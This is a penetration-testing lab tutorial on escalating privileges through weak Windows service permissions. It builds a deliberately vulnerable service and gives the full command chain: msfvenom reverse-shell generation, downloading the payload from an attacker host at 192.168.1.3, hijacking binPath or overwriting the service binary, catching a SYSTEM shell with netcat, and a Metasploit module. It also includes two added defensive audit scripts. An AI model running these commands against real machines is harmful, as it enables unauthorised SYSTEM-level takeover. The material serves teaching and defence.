Microsoft Windows offers a wide range of fine-grained permissions and privileges for controlling access to Windows components including services, files, and registry entries. Exploiting misconfigured services is one technique to increase privileges.
Table of Contents
· MS Windows Services
· Access Rights for the Service Control Manager
· Weak Service Permission Lab Setup
· Abusing Insecure Configuration File Permissions (PTOC)
· Abusing Insecure Service Executable (PTO)
· Metasploit
MS Windows Services
Microsoft Windows services, formerly known as NT services, enable you to create long-running executable applications that run in their own Windows sessions. These services can be automatically started when the computer boots, can be paused and restarted, and do not show any user interface. For each service, a registry key exists in HKLM\SYSTEM\CurrentControlSet\Services.
A system or a user account must be linked to a service for it to function properly. The following built-in system accounts are frequently used to operate services:
· LocalService
· NetworkService
· LocalSystem
Access Rights for the Service Control Manager
The SCM creates a service object's security descriptor when the service is installed by the CreateService function. The default security descriptor of a service object grants the following access.
Weak Service Permission Lab Setup
This article will help to set up a lab that focuses on two Windows weak service permission misconfigurations that allow an attacker to gain administrative privileges:
• Insecure Configuration File Permissions: A low-privileged user can update service settings, such as the service binary that runs when the service starts.
• Insecure Service Executable: A low-privileged user can overwrite the binary that the service launches when it starts.
An Access Control List (ACL) for each service defines the permissions for that service. Some permissions are extremely damaging, because they allow a user to run commands such as:
· sc qc <service> - query the configuration of the service
· sc query <service> - check the current status of the service
· net start/stop <service> - start and stop the service
· sc config <service> <option>= <value> - change the configuration of the service
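The access rights described in the Service Control Manager section and the damaging permissions listed above can be audited from a service's security descriptor, which the built-in `sc sdshow <service>` command prints in SDDL form. The following script is an added example (not from the original article): it maps the two-letter SDDL right codes to their SERVICE_* names and flags any trustee other than SYSTEM or Administrators that holds rights allowing the service definition to be rewritten, or that holds only start/stop/pause rights (which matter when the binary is writable). The two SDDL strings at the bottom are constructed samples, and the S-1-5-21-... SID is a placeholder.

```python
"""Audit a service DACL for rights that let a non-administrator rewrite or bounce it.

Added example, not part of the original article. Input is the SDDL string that the
built-in `sc sdshow <service>` command prints; the sample strings below are constructed.
"""
import re
from dataclasses import dataclass

# Service access rights: SDDL two-letter code, name and mask, per the Microsoft
# "Service Security and Access Rights" page referenced by the article.
RIGHTS = [
    ("CC", "SERVICE_QUERY_CONFIG", 0x0001),
    ("DC", "SERVICE_CHANGE_CONFIG", 0x0002),
    ("LC", "SERVICE_QUERY_STATUS", 0x0004),
    ("SW", "SERVICE_ENUMERATE_DEPENDENTS", 0x0008),
    ("RP", "SERVICE_START", 0x0010),
    ("WP", "SERVICE_STOP", 0x0020),
    ("DT", "SERVICE_PAUSE_CONTINUE", 0x0040),
    ("LO", "SERVICE_INTERROGATE", 0x0080),
    ("CR", "SERVICE_USER_DEFINED_CONTROL", 0x0100),
    ("SD", "DELETE", 0x00010000),
    ("RC", "READ_CONTROL", 0x00020000),
    ("WD", "WRITE_DAC", 0x00040000),
    ("WO", "WRITE_OWNER", 0x00080000),
    ("GA", "GENERIC_ALL", 0x10000000),
    ("GW", "GENERIC_WRITE", 0x40000000),
]
BY_CODE = {code: name for code, name, _ in RIGHTS}

# Rights that allow changing the service definition (the "C" in PTOC) or its DACL.
REWRITE = {"SERVICE_CHANGE_CONFIG", "WRITE_DAC", "WRITE_OWNER", "DELETE",
           "GENERIC_ALL", "GENERIC_WRITE"}
# Start/stop/pause: harmless alone, but enough to launch an overwritten binary (PTO case).
CONTROL = {"SERVICE_START", "SERVICE_STOP", "SERVICE_PAUSE_CONTINUE"}
# Trustees expected to hold full control: LocalSystem (SY) and Administrators (BA).
TRUSTED = {"SY", "BA"}

# ACE layout: (type;flags;rights;object_guid;inherit_object_guid;trustee)
ACE_RE = re.compile(r"\(([^;]*);([^;]*);([^;]*);([^;]*);([^;]*);([^)]*)\)")


def parse_rights(field_text: str) -> set:
    """Turn an SDDL rights field (letter pairs or a 0x mask) into right names."""
    if field_text.lower().startswith("0x"):
        mask = int(field_text, 16)
        return {name for _, name, bit in RIGHTS if mask & bit}
    if len(field_text) % 2:
        raise ValueError(f"odd-length rights field: {field_text!r}")
    pairs = [field_text[i:i + 2] for i in range(0, len(field_text), 2)]
    return {BY_CODE.get(p, p) for p in pairs}


def dacl_aces(sddl: str) -> list:
    """Return the ACE tuples of the DACL part of an SDDL string (the SACL after 'S:' is ignored)."""
    m = re.search(r"D:(.*?)(?:S:|$)", sddl)
    if not m:
        raise ValueError("SDDL string has no DACL")
    return ACE_RE.findall(m.group(1))


@dataclass
class Finding:
    trustee: str
    rights: set
    reason: str


def audit(sddl: str) -> list:
    """Return one Finding per non-trusted trustee holding rewrite or control rights."""
    findings = []
    for ace_type, _flags, rights_text, _g1, _g2, trustee in dacl_aces(sddl):
        if ace_type != "A" or trustee in TRUSTED:
            continue  # deny ACEs grant nothing; SYSTEM/Administrators are expected
        rights = parse_rights(rights_text)
        if rights & REWRITE:
            findings.append(Finding(trustee, rights & REWRITE,
                                    "can change binPath/account or the DACL itself"))
        elif rights & CONTROL:
            findings.append(Finding(trustee, rights & CONTROL,
                                    "can start/stop/pause; exploitable if the binary is writable"))
    return findings


# Constructed sample: a typical default service DACL (no findings expected).
DEFAULT_SDDL = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
                "(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)"
                "S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)")
# Constructed sample: the same DACL after a user was granted PTOC (DC+RP+WP+DT);
# the SID is a placeholder, not a real account.
LAB_SDDL = DEFAULT_SDDL.replace("S:", "(A;;DCRPWPDT;;;S-1-5-21-1111-2222-3333-1001)S:")

if __name__ == "__main__":
    for label, sddl in (("default", DEFAULT_SDDL), ("lab", LAB_SDDL)):
        print(label, audit(sddl) or "no findings")
```

Run it against the output of `sc sdshow pentest` on the lab machine: the default descriptor produces no findings, while the PTOC grant shows up as a SERVICE_CHANGE_CONFIG finding for the user's SID. Hex masks (which appear when a tool writes a mask that has no clean letter-pair rendering) are decoded through the same table.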
Steps for Weak Services Permissions
Step 1: Run CMD as administrator and execute the command below to create a service named pentest whose binary lives in the C:\temp directory.
sc.exe create pentest binPath= "C:\temp\service.exe"
Step 2: To create a vulnerable service we need to assign some toxic privileges with the help of SubInACL, which can change the permissions of services.
NOTE: SubInACL is a little-known command-line tool from Microsoft, yet it is one of the best tools to work with security permissions in Windows. This tool is capable of changing the permissions of files, folders, registry keys, services, printers, cluster shares and various other types of objects.
In this case, we have granted a user permissions to suspend (pause/continue), start and stop (restart) a service. The full list of the available service permissions:
Step 3: After downloading SubInACL, execute the following commands to assign PTOC permissions to the user "ignite" on the "pentest" service.
cd C:\Program Files (x86)\Windows Resource Kits\Tools
subinacl.exe /service pentest /grant=msedgewin10\ignite=PTOC
Abusing Insecure Configuration File Permissions (PTOC)
An attacker can escalate privileges by exploiting the service configuration if a low-privileged user holds the SERVICE_ALL_ACCESS or SERVICE_CHANGE_CONFIG permission on the service.
Following an initial foothold, you may use the wmic utility to enumerate system services and query for the service name, start name (the account it runs as), and binary path.
wmic service get name,startname,pathname
The service named pentest exists in the C:\temp directory, as shown in the following image. We may verify the service configuration with the following command.
sc qc pentest
According to the output, the service runs as LocalSystem, and it can be started, stopped, and paused.
We can identify SERVICE_ALL_ACCESS or SERVICE_CHANGE_CONFIG permissions using the accesschk Sysinternals tool, since these rights allow an attacker to change the service settings.
accesschk.exe /accepteula -uwcqv ignite pentest
The output shows that the user ignite has full access to this service.
Create an executable reverse shell and transfer it to the victim machine, then modify the service binary path to point at the malicious executable; the user ignite has full access to the service and therefore has the ability to change its configuration.
msfvenom -p windows/shell_reverse_tcp lhost=192.168.1.3 lport=8888 -f exe > shell.exe
python -m SimpleHTTPServer 80
Use the following commands to transfer the malicious shell.exe into C:\Users\Public, and start a new Netcat listener within Kali Linux.
cd c:\Users\public
powershell wget http://192.168.1.3/shell.exe -o shell.exe
dir
Because the ignite user has access to edit the service configuration and subsequently start the service, we can change the binary path and point it at our reverse shell payload.
sc config pentest binPath= "C:\Users\Public\shell.exe"
net start pentest
As soon as the service launches, the attacker gets a reverse connection in the new Netcat session as NT AUTHORITY\SYSTEM.
nc -lvp 8888
whoami
Abusing Insecure Service Executable (PTO)
If the low-privileged user has at least Pause/Continue, Start, and Stop permissions for the service, an attacker may attempt to overwrite the service binary with a malicious executable file in order to escalate privileges.
cd c:\temp
dir
move service.exe service.bak
Use the following command to transfer the malicious shell.exe into C:\temp under the name service.exe, and start a new Netcat listener within Kali Linux.
powershell wget http://192.168.1.3/shell.exe -o service.exe
As soon as the service launches, the attacker gets a reverse connection in the new Netcat session as NT AUTHORITY\SYSTEM.
nc -lvp 8888
whoami
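Both techniques on this page depend on where the service binary lives: the wmic enumeration earlier in the article reveals the path, and the overwrite in this section only works when a standard user can write to that path. The following script is an added example (not from the original article) that parses the fixed-width table printed by `wmic service get name,startname,pathname` and flags services whose executable sits outside the usual protected roots (C:\Windows and the Program Files directories), together with the account they run as. The table embedded below is a constructed sample; wmic prints the requested columns in alphabetical order (Name, PathName, StartName), each padded to the widest value in the column. The protected-root list is a triage heuristic; the authoritative check is the binary's own ACL with accesschk or icacls.

```python
"""Triage 'wmic service get name,startname,pathname' output for service binaries that
live outside protected directories.

Added example, not part of the original article. WMIC_SAMPLE is a constructed sample
of wmic's fixed-width table; wmic prints requested columns in alphabetical order
(Name, PathName, StartName), each padded to the widest value in the column.
"""
import re

# Directories where a standard user normally cannot replace files. Heuristic only;
# the authoritative check is the binary's ACL (accesschk / icacls).
PROTECTED_ROOTS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")

# Constructed sample of wmic output (the 'pentest' row mirrors the lab service).
WMIC_SAMPLE = r"""Name      PathName                                      StartName
pentest   C:\temp\service.exe                           LocalSystem
Spooler   C:\Windows\System32\spoolsv.exe               LocalSystem
wuauserv  C:\Windows\system32\svchost.exe -k netsvcs    LocalSystem
updater   "C:\Program Files\Vendor App\upd.exe" /svc    NT AUTHORITY\LocalService
"""


def parse_wmic_table(text: str) -> list:
    """Parse wmic's fixed-width table into dicts keyed by the header names."""
    lines = [ln.rstrip("\r") for ln in text.splitlines() if ln.strip()]
    header = lines[0]
    # Each column starts where its header word begins and runs to the next header word.
    starts = [m.start() for m in re.finditer(r"\S+", header)]
    bounds = list(zip(starts, starts[1:] + [None]))
    names = [header[s:e].strip() for s, e in bounds]
    rows = []
    for ln in lines[1:]:
        cells = [ln[s:e].strip() for s, e in bounds]
        rows.append(dict(zip(names, cells)))
    return rows


def service_binary(pathname: str) -> str:
    """Extract the executable path from a PathName value (quoted, or followed by arguments)."""
    pathname = pathname.strip()
    if pathname.startswith('"'):
        return pathname[1:pathname.index('"', 1)]
    m = re.search(r"\.exe\b", pathname, re.IGNORECASE)  # unquoted: cut right after .exe
    return pathname[:m.end()] if m else pathname.split()[0]


def triage(text: str) -> list:
    """Return (name, binary, account) for services whose binary is outside protected roots."""
    flagged = []
    for row in parse_wmic_table(text):
        binary = service_binary(row["PathName"])
        if not binary.lower().startswith(PROTECTED_ROOTS):
            flagged.append((row["Name"], binary, row["StartName"]))
    return flagged


if __name__ == "__main__":
    for name, binary, account in triage(WMIC_SAMPLE):
        print(f"{name}: {binary} runs as {account}; verify the file and directory ACLs")
```

Feed it the real wmic output redirected to a file; every flagged service running as LocalSystem is a candidate for the PTO case above and should have its file and directory permissions reviewed and corrected.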
Metasploit
This module attempts to exploit existing administrative privileges to obtain a SYSTEM session. If directly creating a service fails, the module inspects existing services to look for insecure configuration, file or registry permissions that may be hijacked. It then attempts to restart the replaced service to run the payload.
use exploit/windows/local/service_permissions
set lhost 192.168.1.3
set session 1
exploit
When this succeeds, it results in a new session as NT AUTHORITY\SYSTEM.
https://docs.microsoft.com/en-us/windows/win32/services/service-security-and-access-rights